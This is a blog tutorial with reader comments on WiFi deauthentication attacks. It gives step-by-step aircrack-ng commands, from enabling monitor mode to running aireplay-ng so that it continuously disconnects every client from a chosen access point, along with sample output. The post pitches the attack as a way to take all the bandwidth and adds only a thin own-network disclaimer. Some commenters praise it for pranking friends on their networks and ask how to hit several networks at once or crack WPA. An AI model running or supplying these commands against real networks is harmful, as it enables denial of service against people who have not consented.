DeAuth Attack – A simple tutorial

First a little bit of info on what De-authentication is:

It is an attack through which we send disassociation packets to computers/devices connected to a particular WiFi access point. This will disconnect all connected computers from that access point (It won’t work if there are no associated wireless client or on fake authentications).

This attack is usually used for following purposes:

  • Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked.”
  • Capturing WPA/WPA2 handshakes by forcing clients to re-authenticate
  • Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected)
  • If those three point don’t make any sense, in simple words, this attack disconnects computers from an access point so you can have all WiFi bandwidth for yourself :p

Some people have asked me that how come DeAuthentication attack works on clients which are connected to Access Point using encrypted connection (WEP/WPA)? The answer is that 802.11b/a/n/g management frames, special packets used to establish and maintain communications, are all sent unencrypted. These include:

  • Authentication
  • De-authentication
  • Association request
  • Association response
  • Re-association request
  • Re-association response
  • Probe request
  • Probe response
  • Beacon

Here we are only interested in De-Authentication.

In this tutorial we will learn how to perform this attack in FIVE simple steps (for research purposes only).

So lets begin:

I am posting this method for Linux but I suppose this will work on Windows too.

FIRST: You will need aircrack-ng. The method of installing it is different for every Linux distribution. In Ubuntu you can install it by issuing following command in terminal window:

sudo apt-get install aircrack-ng

SECOND: After installing it we need to find out if our network adapter is detected by system or not.

Issue following command in terminal window to get a list of detected adapters:

sudo airmon-ng

This will show an output like this:

UltimatePeter@ASUS-PC:~$ sudo airmon-ng
Interface       Chipset                 Driver
wlan0              Intel 965CDX     iwl3965 – [phy0]

It may show other adapters like eth0, eth1 and so on, but we need only wlan0 (e.i. the Wireless Adapter).

THIRD: Now we need to put our Wireless card to monitor mode, issue following command in terminal window:

sudo airmon-ng start wlan0

which will show a message “monitor mode enabled on mon0″, where mon0 is a new interface which we will use for monitoring.

FOURTH: Now we need to find out which networks are available from our location. Make sure you are as close to your desired access point as possible and issue this command in terminal:

sudo airodump-ng mon0

Note down the BSSID (MAC address) of your access point.

FIFTH: The final step! Issue following command in terminal:

sudo aireplay-ng -0 0 -a 00:AB:6C:CD:40:70 -c mon0

Where,

-0 is for deAuthentication.

0  (zero) is for continuously sending deAuthentication packets.

-a 00:AB:6C:CD:40:70 is the BSSID of your network. (Replace 00:AB:6C:CD:40:70 with your network’s BSSID).

mon0 is the monitor interface we created earlier.

We will get an output like this:

20:10:02  Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:02  Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:03  Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:03  Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]

This means our deAuthentication attack is successful.

Now… of course, this tutorial is only for use on your own home network and pieces of equipment you own. Like, maybe somebody is on your wifi and you want to kick them off, right?

Bookmark the permalink.

6 Responses to DeAuth Attack – A simple tutorial

  1. toSve says:

    This is great when you have a party or friends coming over and you want to prank them, or when you are at a friends place and want to prank him
    Thanks for the tutorial Peter.

  2. mikeydoo says:

    Is it possible to deauth multiple access points together. Let’s say I have 6 wireless cards and I’m trying to capture from 4 networks. Can I deauth all 4 together or will I have to run separate instances of it.

    • Phil Collins says:

      Just set the different wireless cards for different targets.
      So when you do airmon-ng, specify which card you’re turning on monitoring. for example, run airmon-ng wlan0 and airmon-ng wlan1 for different monitoring.

  3. T-Bone says:

    h

    Hey Peter, finally I get to meet you. I can hack wep all day long, but I still can’t do a WPA. Please help me, thanks!

  4. Dan says:

    Is it possible to deauth using a single packet? If so how?
    You can extract a packet and use it in the help options just unsure how to use it
    Regards dan

  5. BootEXE says:

    the “-c” option is for a specific client if you want to death all you need to delete the ” -c” option or you will get the error invalid Mac adresse

Leave a Reply to toSve Cancel reply

Your email address will not be published. Required fields are marked *